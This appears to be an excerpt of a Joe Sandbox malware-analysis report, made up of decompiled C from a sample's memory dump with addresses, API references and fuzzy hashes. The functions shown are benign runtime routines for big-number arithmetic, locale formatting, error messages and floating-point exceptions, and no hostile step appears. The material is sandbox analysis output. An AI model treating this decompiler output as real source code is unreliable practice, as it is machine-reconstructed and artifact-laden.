                                                    																asm("adc dword [ebp-0x28], 0x0");
                                                    																_v68 = _t209;
                                                    																if(_t333 == 0) {
                                                    																	__eflags = _t333 - 0xffffffff;
                                                    																	if(_t333 <= 0xffffffff) {
                                                    																		continue;
                                                    																	} else {
                                                    																	}
                                                    																}
                                                    															} else {
                                                    																__eflags = _t228 - _v8;
                                                    																if(_t228 <= _v8) {
                                                    																	break;
                                                    																} else {
                                                    																	goto L47;
                                                    																}
                                                    															}
                                                    															L51:
                                                    															_v8 = _t263;
                                                    															goto L52;
                                                    														}
                                                    														_t209 = _v28;
                                                    														goto L51;
                                                    													}
                                                    												}
                                                    											}
                                                    											L52:
                                                    											__eflags = _t209;
                                                    											if(_t209 != 0) {
                                                    												L54:
                                                    												_t280 = _v60;
                                                    												_t334 = 0;
                                                    												_t355 = 0;
                                                    												__eflags = _t280;
                                                    												if(_t280 != 0) {
                                                    													_t266 = _v20;
                                                    													_t219 =  &(_a8[1]);
                                                    													__eflags = _t219;
                                                    													_v24 = _t219;
                                                    													_v16 = _t280;
                                                    													do {
                                                    														_v44 =  *_t219;
                                                    														_t225 =  *_t266;
                                                    														_t286 = _t334 + _v72 * _v44;
                                                    														asm("adc esi, edx");
                                                    														_t334 = _t355;
                                                    														_t355 = 0;
                                                    														__eflags = _t225 - _t286;
                                                    														if(_t225 < _t286) {
                                                    															_t334 = _t334 + 1;
                                                    															asm("adc esi, esi");
                                                    														}
                                                    														 *_t266 = _t225 - _t286;
                                                    														_t266 = _t266 + 4;
                                                    														_t219 = _v24 + 4;
                                                    														_t164 =  &_v16;
                                                    														 *_t164 = _v16 - 1;
                                                    														__eflags =  *_t164;
                                                    														_v24 = _t219;
                                                    													} while ( *_t164 != 0);
                                                    													_t263 = _v8;
                                                    													_t280 = _v60;
                                                    												}
                                                    												__eflags = 0 - _t355;
                                                    												if(__eflags <= 0) {
                                                    													if(__eflags < 0) {
                                                    														L63:
                                                    														__eflags = _t280;
                                                    														if(_t280 != 0) {
                                                    															_t338 = _t280;
                                                    															_t314 = _v20;
                                                    															_t362 =  &(_a8[1]);
                                                    															__eflags = _t362;
                                                    															_t265 = 0;
                                                    															do {
                                                    																_t282 =  *_t314;
                                                    																_t172 = _t362 + 4; // 0xa6a5959
                                                    																_t362 = _t172;
                                                    																_t314 = _t314 + 4;
                                                    																asm("adc eax, eax");
                                                    																 *((intOrPtr*)(_t314 - 4)) = _t282 +  *((intOrPtr*)(_t362 - 4)) + _t265;
                                                    																asm("adc eax, 0x0");
                                                    																_t265 = 0;
                                                    																_t338 = _t338 - 1;
                                                    																__eflags = _t338;
                                                    															} while (_t338 != 0);
                                                    															_t263 = _v8;
                                                    														}
                                                    														_t263 = _t263 + 0xffffffff;
                                                    														asm("adc dword [ebp-0x18], 0xffffffff");
                                                    													} else {
                                                    														__eflags = _v52 - _t334;
                                                    														if(_v52 < _t334) {
                                                    															goto L63;
                                                    														}
                                                    													}
                                                    												}
                                                    												_t213 = _v12 - 1;
                                                    												__eflags = _t213;
                                                    												_v16 = _t213;
                                                    											} else {
                                                    												__eflags = _t263;
                                                    												if(_t263 != 0) {
                                                    													goto L54;
                                                    												}
                                                    											}
                                                    											_t331 = 0 + _t263;
                                                    											asm("adc esi, 0x0");
                                                    											_v20 = _v20 - 4;
                                                    											_t313 = _v32 - 1;
                                                    											_t262 = _a4;
                                                    											_t278 = _v80 - 4;
                                                    											_t206 = _v12 - 1;
                                                    											_v76 = _t331;
                                                    											_v32 = _t313;
                                                    											_v80 = _t278;
                                                    											_v12 = _t206;
                                                    											__eflags = _t313;
                                                    										} while (_t313 >= 0);
                                                    									}
                                                    									_t309 = _v16 + 1;
                                                    									_t204 = _t309;
                                                    									__eflags = _t204 -  *_t262;
                                                    									if(_t204 <  *_t262) {
                                                    										_t191 = _t204 + 1; // 0xceea5d
                                                    										_t274 =  &(_t262[_t191]);
                                                    										do {
                                                    											 *_t274 = 0;
                                                    											_t194 =  &(_t274[1]); // 0x91850fc2
                                                    											_t274 = _t194;
                                                    											_t204 = _t204 + 1;
                                                    											__eflags = _t204 -  *_t262;
                                                    										} while (_t204 <  *_t262);
                                                    									}
                                                    									 *_t262 = _t309;
                                                    									__eflags = _t309;
                                                    									if(_t309 != 0) {
                                                    										while(1) {
                                                    											_t271 =  *_t262;
                                                    											__eflags = _t262[_t271];
                                                    											if(_t262[_t271] != 0) {
                                                    												goto L78;
                                                    											}
                                                    											_t272 = _t271 + 0xffffffff;
                                                    											__eflags = _t272;
                                                    											 *_t262 = _t272;
                                                    											if(_t272 != 0) {
                                                    												continue;
                                                    											}
                                                    											goto L78;
                                                    										}
                                                    									}
                                                    									L78:
                                                    									return _t331;
                                                    								} else {
                                                    									goto L23;
                                                    								}
                                                    							}
                                                    						} else {
                                                    							_t6 =  &(_t328[1]); // 0xfc23b5a
                                                    							_t295 =  *_t6;
                                                    							_v44 = _t295;
                                                    							__eflags = _t295 - 1;
                                                    							if(_t295 != 1) {
                                                    								__eflags = _t349;
                                                    								if(_t349 != 0) {
                                                    									_t342 = 0;
                                                    									_v12 = 0;
                                                    									_v8 = 0;
                                                    									_v20 = 0;
                                                    									__eflags = _t349 - 0xffffffff;
                                                    									if(_t349 != 0xffffffff) {
                                                    										_t250 = _v16 + 1;
                                                    										__eflags = _t250;
                                                    										_v32 = _t250;
                                                    										_t373 =  &(_t262[_t349 + 1]);
                                                    										do {
                                                    											_t253 = E00CF21C0( *_t373, _t342, _t295, 0);
                                                    											_v68 = _t303;
                                                    											_t373 = _t373 - 4;
                                                    											_v20 = _t262;
                                                    											_t342 = _t295;
                                                    											_t303 = 0 + _t253;
                                                    											asm("adc ecx, 0x0");
                                                    											_v12 = _t303;
                                                    											_t34 =  &_v32;
                                                    											 *_t34 = _v32 - 1;
                                                    											__eflags =  *_t34;
                                                    											_v8 = _v12;
                                                    											_t295 = _v44;
                                                    										} while ( *_t34 != 0);
                                                    										_t262 = _a4;
                                                    									}
                                                    									_v544 = 0;
                                                    									_t41 =  &(_t262[1]); // 0x4
                                                    									_t370 = _t41;
                                                    									 *_t262 = 0;
                                                    									E00CEBDE1(_t370, 0x1cc,  &_v540, 0);
                                                    									_t247 = _v20;
                                                    									__eflags = 0 - _t247;
                                                    									 *_t370 = _t342;
                                                    									_t262[2] = _t247;
                                                    									asm("sbb ecx, ecx");
                                                    									__eflags =  ~0x00000000;
                                                    									 *_t262 = 0xbadbae;
                                                    									return _v12;
                                                    								} else {
                                                    									_t14 =  &(_t262[1]); // 0x4
                                                    									_t344 = _t14;
                                                    									_v544 = 0;
                                                    									 *_t262 = 0;
                                                    									E00CEBDE1(_t344, 0x1cc,  &_v540, 0);
                                                    									_t256 = _t262[1];
                                                    									_t322 = _t256 % _v44;
                                                    									__eflags = 0 - _t322;
                                                    									 *_t344 = _t322;
                                                    									asm("sbb ecx, ecx");
                                                    									__eflags = 0;
                                                    									 *_t262 =  ~0x00000000;
                                                    									return _t256 / _v44;
                                                    								}
                                                    							} else {
                                                    								_t9 =  &(_t262[1]); // 0x4
                                                    								_v544 = _t198;
                                                    								 *_t262 = _t198;
                                                    								E00CEBDE1(_t9, 0x1cc,  &_v540, _t198);
                                                    								__eflags = 0;
                                                    								return _t262[1];
                                                    							}
                                                    						}
                                                    					} else {
                                                    						__eflags = 0;
                                                    						return 0;
                                                    					}
                                                    				} else {
                                                    					return _t197;
                                                    				}
                                                    			}























































































                                                    0x00ced667
                                                    0x00ced66e
                                                    0x00ced66e
                                                    0x00ced671
                                                    0x00ced674
                                                    0x00ced8a6
                                                    0x00ced8a6
                                                    0x00ced67a
                                                    0x00ced67a
                                                    0x00ced680
                                                    0x00ced683
                                                    0x00ced686
                                                    0x00ced689
                                                    0x00ced68c
                                                    0x00ced68f
                                                    0x00ced692
                                                    0x00ced692
                                                    0x00ced695
                                                    0x00ced69c
                                                    0x00ced69c
                                                    0x00ced697
                                                    0x00ced697
                                                    0x00ced697
                                                    0x00ced69e
                                                    0x00ced6a2
                                                    0x00ced6a5
                                                    0x00ced6a7
                                                    0x00ced6aa
                                                    0x00ced6b1
                                                    0x00ced6b4
                                                    0x00ced6b7
                                                    0x00ced6c2
                                                    0x00ced6c5
                                                    0x00ced6ca
                                                    0x00ced6cf
                                                    0x00ced6d6
                                                    0x00ced6db
                                                    0x00ced6dd
                                                    0x00ced6df
                                                    0x00ced6e3
                                                    0x00ced6e6
                                                    0x00ced6e9
                                                    0x00ced6f1
                                                    0x00ced6fa
                                                    0x00ced6fa
                                                    0x00ced6fc
                                                    0x00ced6ff
                                                    0x00ced6ff
                                                    0x00ced6e9
                                                    0x00ced709
                                                    0x00ced70e
                                                    0x00ced713
                                                    0x00ced715
                                                    0x00ced718
                                                    0x00ced71a
                                                    0x00ced71d
                                                    0x00ced720
                                                    0x00ced722
                                                    0x00ced725
                                                    0x00ced728
                                                    0x00ced72a
                                                    0x00ced731
                                                    0x00ced736
                                                    0x00ced739
                                                    0x00ced743
                                                    0x00ced745
                                                    0x00ced747
                                                    0x00ced74a
                                                    0x00ced74a
                                                    0x00ced74c
                                                    0x00ced74f
                                                    0x00ced752
                                                    0x00ced755
                                                    0x00ced758
                                                    0x00ced72c
                                                    0x00ced72c
                                                    0x00ced72f
                                                    0x00000000
                                                    0x00000000
                                                    0x00ced72f
                                                    0x00ced75b
                                                    0x00ced75d
                                                    0x00ced75f
                                                    0x00000000
                                                    0x00ced761
                                                    0x00ced761
                                                    0x00ced764
                                                    0x00ced766
                                                    0x00ced766
                                                    0x00ced774
                                                    0x00ced777
                                                    0x00ced77c
                                                    0x00ced77e
                                                    0x00000000
                                                    0x00000000
                                                    0x00ced780
                                                    0x00ced787
                                                    0x00ced787
                                                    0x00ced78a
                                                    0x00ced78d
                                                    0x00ced790
                                                    0x00ced793
                                                    0x00ced793
                                                    0x00ced796
                                                    0x00ced799
                                                    0x00ced79d
                                                    0x00ced7a0
                                                    0x00ced7a2
                                                    0x00ced7a5
                                                    0x00000000
                                                    0x00000000
                                                    0x00ced7a7
                                                    0x00ced7a5
                                                    0x00ced782
                                                    0x00ced782
                                                    0x00ced785
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ced785
                                                    0x00ced7ac
                                                    0x00ced7ac
                                                    0x00000000
                                                    0x00ced7ac
                                                    0x00ced7a9
                                                    0x00000000
                                                    0x00ced7a9
                                                    0x00ced764
                                                    0x00ced75f
                                                    0x00ced7af
                                                    0x00ced7af
                                                    0x00ced7b1
                                                    0x00ced7bb
                                                    0x00ced7bb
                                                    0x00ced7be
                                                    0x00ced7c0
                                                    0x00ced7c2
                                                    0x00ced7c4
                                                    0x00ced7c9
                                                    0x00ced7cc
                                                    0x00ced7cc
                                                    0x00ced7cf
                                                    0x00ced7d2
                                                    0x00ced7d5
                                                    0x00ced7d7
                                                    0x00ced7ec
                                                    0x00ced7ee
                                                    0x00ced7f0
                                                    0x00ced7f2
                                                    0x00ced7f4
                                                    0x00ced7f6
                                                    0x00ced7f8
                                                    0x00ced7fa
                                                    0x00ced7fd
                                                    0x00ced7fd
                                                    0x00ced801
                                                    0x00ced803
                                                    0x00ced809
                                                    0x00ced80c
                                                    0x00ced80c
                                                    0x00ced80c
                                                    0x00ced810
                                                    0x00ced810
                                                    0x00ced815
                                                    0x00ced818
                                                    0x00ced818
                                                    0x00ced81d
                                                    0x00ced81f
                                                    0x00ced821
                                                    0x00ced828
                                                    0x00ced828
                                                    0x00ced82a
                                                    0x00ced82f
                                                    0x00ced831
                                                    0x00ced834
                                                    0x00ced834
                                                    0x00ced837
                                                    0x00ced840
                                                    0x00ced840
                                                    0x00ced842
                                                    0x00ced842
                                                    0x00ced847
                                                    0x00ced84d
                                                    0x00ced851
                                                    0x00ced854
                                                    0x00ced857
                                                    0x00ced859
                                                    0x00ced859
                                                    0x00ced859
                                                    0x00ced85e
                                                    0x00ced85e
                                                    0x00ced861
                                                    0x00ced864
                                                    0x00ced823
                                                    0x00ced823
                                                    0x00ced826
                                                    0x00000000
                                                    0x00000000
                                                    0x00ced826
                                                    0x00ced821
                                                    0x00ced86b
                                                    0x00ced86b
                                                    0x00ced86c
                                                    0x00ced7b3
                                                    0x00ced7b3
                                                    0x00ced7b5
                                                    0x00000000
                                                    0x00000000
                                                    0x00ced7b5
                                                    0x00ced87c
                                                    0x00ced881
                                                    0x00ced884
                                                    0x00ced888
                                                    0x00ced889
                                                    0x00ced88c
                                                    0x00ced88f
                                                    0x00ced890
                                                    0x00ced893
                                                    0x00ced896
                                                    0x00ced899
                                                    0x00ced89c
                                                    0x00ced89c
                                                    0x00ced8a4
                                                    0x00ced8ab
                                                    0x00ced8ac
                                                    0x00ced8ae
                                                    0x00ced8b0
                                                    0x00ced8b2
                                                    0x00ced8b5
                                                    0x00ced8c0
                                                    0x00ced8c0
                                                    0x00ced8c6
                                                    0x00ced8c6
                                                    0x00ced8c9
                                                    0x00ced8ca
                                                    0x00ced8ca
                                                    0x00ced8c0
                                                    0x00ced8ce
                                                    0x00ced8d0
                                                    0x00ced8d2
                                                    0x00ced8d4
                                                    0x00ced8d4
                                                    0x00ced8d6
                                                    0x00ced8da
                                                    0x00000000
                                                    0x00000000
                                                    0x00ced8dc
                                                    0x00ced8dc
                                                    0x00ced8df
                                                    0x00ced8e1
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ced8e1
                                                    0x00ced8d4
                                                    0x00ced8e3
                                                    0x00ced8ed
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ced5f8
                                                    0x00ced482
                                                    0x00ced482
                                                    0x00ced482
                                                    0x00ced485
                                                    0x00ced488
                                                    0x00ced48b
                                                    0x00ced4bc
                                                    0x00ced4be
                                                    0x00ced509
                                                    0x00ced50b
                                                    0x00ced512
                                                    0x00ced519
                                                    0x00ced51c
                                                    0x00ced51f
                                                    0x00ced525
                                                    0x00ced525
                                                    0x00ced526
                                                    0x00ced529
                                                    0x00ced530
                                                    0x00ced539
                                                    0x00ced53e
                                                    0x00ced541
                                                    0x00ced546
                                                    0x00ced549
                                                    0x00ced54b
                                                    0x00ced550
                                                    0x00ced553
                                                    0x00ced556
                                                    0x00ced556
                                                    0x00ced556
                                                    0x00ced55a
                                                    0x00ced55d
                                                    0x00ced55d
                                                    0x00ced562
                                                    0x00ced562
                                                    0x00ced56d
                                                    0x00ced578
                                                    0x00ced578
                                                    0x00ced57b
                                                    0x00ced587
                                                    0x00ced58c
                                                    0x00ced597
                                                    0x00ced599
                                                    0x00ced59b
                                                    0x00ced5a1
                                                    0x00ced5a6
                                                    0x00ced5a8
                                                    0x00ced5ae
                                                    0x00ced4c0
                                                    0x00ced4cc
                                                    0x00ced4cc
                                                    0x00ced4cf
                                                    0x00ced4df
                                                    0x00ced4e5
                                                    0x00ced4ec
                                                    0x00ced4ee
                                                    0x00ced4f6
                                                    0x00ced4f8
                                                    0x00ced4fa
                                                    0x00ced4ff
                                                    0x00ced502
                                                    0x00ced508
                                                    0x00ced508
                                                    0x00ced48d
                                                    0x00ced490
                                                    0x00ced494
                                                    0x00ced49a
                                                    0x00ced4a9
                                                    0x00ced4b3
                                                    0x00ced4bb
                                                    0x00ced4bb
                                                    0x00ced48b
                                                    0x00ced466
                                                    0x00ced469
                                                    0x00ced46f
                                                    0x00ced46f
                                                    0x00ced455
                                                    0x00ced45b
                                                    0x00ced45b

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                    • Instruction ID: 7c510de64841e7e59483e8ffbea6c7aa83138824b2018a20e7987abacc7ac298
                                                    • Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                    • Instruction Fuzzy Hash: 5F022D71E012199BDF14CFA9C8806ADB7F5FF48314F158269E92AE7384D731AE41CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00CDAF0F(signed int _a4, signed int _a8, short* _a12, int _a16) {
                                                    				short _v104;
                                                    				short _v304;
                                                    				short* _t23;
                                                    				int _t24;
                                                    
                                                    				if( *0xcfe73c == 0) {
                                                    					GetLocaleInfoW(0x400, 0xf,  &_v304, 0x64);
                                                    					 *0xd1fcb0 = _v304;
                                                    					 *0xd1fcb2 = 0;
                                                    					 *0xcfe73c = 0xd1fcb0;
                                                    				}
                                                    				E00CD04BD(_a4, _a8,  &_v104, 0x32);
                                                    				_t23 = _a12;
                                                    				_t24 = _a16;
                                                    				 *_t23 = 0;
                                                    				GetNumberFormatW(0x400, 0,  &_v104, 0xcfe72c, _t23, _t24);
                                                    				 *((short*)(_t23 + _t24 * 2 - 2)) = 0;
                                                    				return 0;
                                                    			}








                                                    APIs
                                                    • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00CDAF35
                                                    • GetNumberFormatW.KERNEL32 ref: 00CDAF84
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: FormatInfoLocaleNumber
                                                    • String ID:
                                                    • API String ID: 2169056816-0
                                                    • Opcode ID: 726e63f3b593431631490bf13e23f6b06197b6e269c713141a0df19a15f49f95
                                                    • Instruction ID: f8cca00918f375a7ee0bcde4675e4bca1212bf0ce74e007ee70b73883032f57f
                                                    • Opcode Fuzzy Hash: 726e63f3b593431631490bf13e23f6b06197b6e269c713141a0df19a15f49f95
                                                    • Instruction Fuzzy Hash: 8D015E3A100348BAD7109F64EC45FAE77B8EF08750F108422FA05D72A0D7709965CBA6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00CC6C74(WCHAR* _a4, long _a8) {
                                                    				long _t5;
                                                    
                                                    				_t5 = GetLastError();
                                                    				if(_t5 == 0) {
                                                    					return 0;
                                                    				}
                                                    				return FormatMessageW(0x1200, 0, _t5, 0x400, _a4, _a8, 0) & 0xffffff00 | _t7 != 0x00000000;
                                                    			}





                                                    APIs
                                                    • GetLastError.KERNEL32(00CC6DDF,00000000,00000400), ref: 00CC6C74
                                                    • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00CC6C95
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: ErrorFormatLastMessage
                                                    • String ID:
                                                    • API String ID: 3479602957-0
                                                    • Opcode ID: bc155bd7904ed474d4a07d490dfdde8b31b7eba2decc267095f5e9cb88bf7c1c
                                                    • Instruction ID: bb15be224b373f85a6c705c2bcc176f67f92f252fcb3f321e88e2a61eff1c9c5
                                                    • Opcode Fuzzy Hash: bc155bd7904ed474d4a07d490dfdde8b31b7eba2decc267095f5e9cb88bf7c1c
                                                    • Instruction Fuzzy Hash: 72D0C971348300BFFA110B628E06F2E7B99BF45B91F18C409B795E80E1CA789564E62A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00CF19F4(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
                                                    				signed int _t172;
                                                    				signed int _t175;
                                                    				signed int _t178;
                                                    				signed int* _t179;
                                                    				signed int _t195;
                                                    				signed int _t199;
                                                    				signed int _t202;
                                                    				void* _t203;
                                                    				void* _t206;
                                                    				signed int _t209;
                                                    				void* _t210;
                                                    				signed int _t225;
                                                    				unsigned int* _t240;
                                                    				signed char _t242;
                                                    				signed int* _t250;
                                                    				unsigned int* _t256;
                                                    				signed int* _t257;
                                                    				signed char _t259;
                                                    				long _t262;
                                                    				signed int* _t265;
                                                    
                                                    				 *(_a4 + 4) = 0;
                                                    				_t262 = 0xc000000d;
                                                    				 *(_a4 + 8) = 0;
                                                    				 *(_a4 + 0xc) = 0;
                                                    				_t242 = _a12;
                                                    				if((_t242 & 0x00000010) != 0) {
                                                    					_t262 = 0xc000008f;
                                                    					 *(_a4 + 4) =  *(_a4 + 4) | 1;
                                                    				}
                                                    				if((_t242 & 0x00000002) != 0) {
                                                    					_t262 = 0xc0000093;
                                                    					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
                                                    				}
                                                    				if((_t242 & 0x00000001) != 0) {
                                                    					_t262 = 0xc0000091;
                                                    					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
                                                    				}
                                                    				if((_t242 & 0x00000004) != 0) {
                                                    					_t262 = 0xc000008e;
                                                    					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                                                    				}
                                                    				if((_t242 & 0x00000008) != 0) {
                                                    					_t262 = 0xc0000090;
                                                    					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
                                                    				}
                                                    				_t265 = _a8;
                                                    				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 << 4) ^  *(_a4 + 8)) & 0x00000010;
                                                    				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 +  *_t265) ^  *(_a4 + 8)) & 0x00000008;
                                                    				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 1) ^  *(_a4 + 8)) & 0x00000004;
                                                    				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 3) ^  *(_a4 + 8)) & 0x00000002;
                                                    				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 5) ^  *(_a4 + 8)) & 1;
                                                    				_t259 = E00CEF352(_a4);
                                                    				if((_t259 & 0x00000001) != 0) {
                                                    					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
                                                    				}
                                                    				if((_t259 & 0x00000004) != 0) {
                                                    					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
                                                    				}
                                                    				if((_t259 & 0x00000008) != 0) {
                                                    					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
                                                    				}
                                                    				if((_t259 & 0x00000010) != 0) {
                                                    					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
                                                    				}
                                                    				if((_t259 & 0x00000020) != 0) {
                                                    					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
                                                    				}
                                                    				_t172 =  *_t265 & 0x00000c00;
                                                    				if(_t172 == 0) {
                                                    					 *_a4 =  *_a4 & 0xfffffffc;
                                                    				} else {
                                                    					if(_t172 == 0x400) {
                                                    						_t257 = _a4;
                                                    						_t225 =  *_t257 & 0xfffffffd | 1;
                                                    						L26:
                                                    						 *_t257 = _t225;
                                                    						L29:
                                                    						_t175 =  *_t265 & 0x00000300;
                                                    						if(_t175 == 0) {
                                                    							_t250 = _a4;
                                                    							_t178 =  *_t250 & 0xffffffeb | 0x00000008;
                                                    							L35:
                                                    							 *_t250 = _t178;
                                                    							L36:
                                                    							_t179 = _a4;
                                                    							_t254 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
                                                    							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
                                                    							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
                                                    							if(_a28 == 0) {
                                                    								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
                                                    								 *((long long*)(_a4 + 0x10)) =  *_a20;
                                                    								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
                                                    								_t254 = _a4;
                                                    								_t240 = _a24;
                                                    								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
                                                    								 *(_a4 + 0x50) =  *_t240;
                                                    							} else {
                                                    								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
                                                    								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
                                                    								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
                                                    								_t240 = _a24;
                                                    								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
                                                    								 *(_a4 + 0x50) =  *_t240;
                                                    							}
                                                    							E00CEF2B8(_t254);
                                                    							RaiseException(_t262, 0, 1,  &_a4);
                                                    							_t256 = _a4;
                                                    							if((_t256[2] & 0x00000010) != 0) {
                                                    								 *_t265 =  *_t265 & 0xfffffffe;
                                                    							}
                                                    							if((_t256[2] & 0x00000008) != 0) {
                                                    								 *_t265 =  *_t265 & 0xfffffffb;
                                                    							}
                                                    							if((_t256[2] & 0x00000004) != 0) {
                                                    								 *_t265 =  *_t265 & 0xfffffff7;
                                                    							}
                                                    							if((_t256[2] & 0x00000002) != 0) {
                                                    								 *_t265 =  *_t265 & 0xffffffef;
                                                    							}
                                                    							if((_t256[2] & 0x00000001) != 0) {
                                                    								 *_t265 =  *_t265 & 0xffffffdf;
                                                    							}
                                                    							_t195 =  *_t256 & 0x00000003;
                                                    							if(_t195 == 0) {
                                                    								 *_t265 =  *_t265 & 0xfffff3ff;
                                                    							} else {
                                                    								_t206 = _t195 - 1;
                                                    								if(_t206 == 0) {
                                                    									_t209 =  *_t265 & 0xfffff7ff | 0x00000400;
                                                    									L55:
                                                    									 *_t265 = _t209;
                                                    									L58:
                                                    									_t199 =  *_t256 >> 0x00000002 & 0x00000007;
                                                    									if(_t199 == 0) {
                                                    										_t202 =  *_t265 & 0xfffff3ff | 0x00000300;
                                                    										L64:
                                                    										 *_t265 = _t202;
                                                    										L65:
                                                    										if(_a28 == 0) {
                                                    											 *_t240 = _t256[0x14];
                                                    										} else {
                                                    											 *_t240 = _t256[0x14];
                                                    										}
                                                    										return _t202;
                                                    									}
                                                    									_t203 = _t199 - 1;
                                                    									if(_t203 == 0) {
                                                    										_t202 =  *_t265 & 0xfffff3ff | 0x00000200;
                                                    										goto L64;
                                                    									}
                                                    									_t202 = _t203 - 1;
                                                    									if(_t202 == 0) {
                                                    										 *_t265 =  *_t265 & 0xfffff3ff;
                                                    									}
                                                    									goto L65;
                                                    								}
                                                    								_t210 = _t206 - 1;
                                                    								if(_t210 == 0) {
                                                    									_t209 =  *_t265 & 0xfffffbff | 0x00000800;
                                                    									goto L55;
                                                    								}
                                                    								if(_t210 == 1) {
                                                    									 *_t265 =  *_t265 | 0x00000c00;
                                                    								}
                                                    							}
                                                    							goto L58;
                                                    						}
                                                    						if(_t175 == 0x200) {
                                                    							_t250 = _a4;
                                                    							_t178 =  *_t250 & 0xffffffe7 | 0x00000004;
                                                    							goto L35;
                                                    						}
                                                    						if(_t175 == 0x300) {
                                                    							 *_a4 =  *_a4 & 0xffffffe3;
                                                    						}
                                                    						goto L36;
                                                    					}
                                                    					if(_t172 == 0x800) {
                                                    						_t257 = _a4;
                                                    						_t225 =  *_t257 & 0xfffffffe | 0x00000002;
                                                    						goto L26;
                                                    					}
                                                    					if(_t172 == 0xc00) {
                                                    						 *_a4 =  *_a4 | 0x00000003;
                                                    					}
                                                    				}
                                                    			}

                                                    APIs
                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00CF19EF,?,?,00000008,?,?,00CF168F,00000000), ref: 00CF1C21
                                                    Memory Dump Source
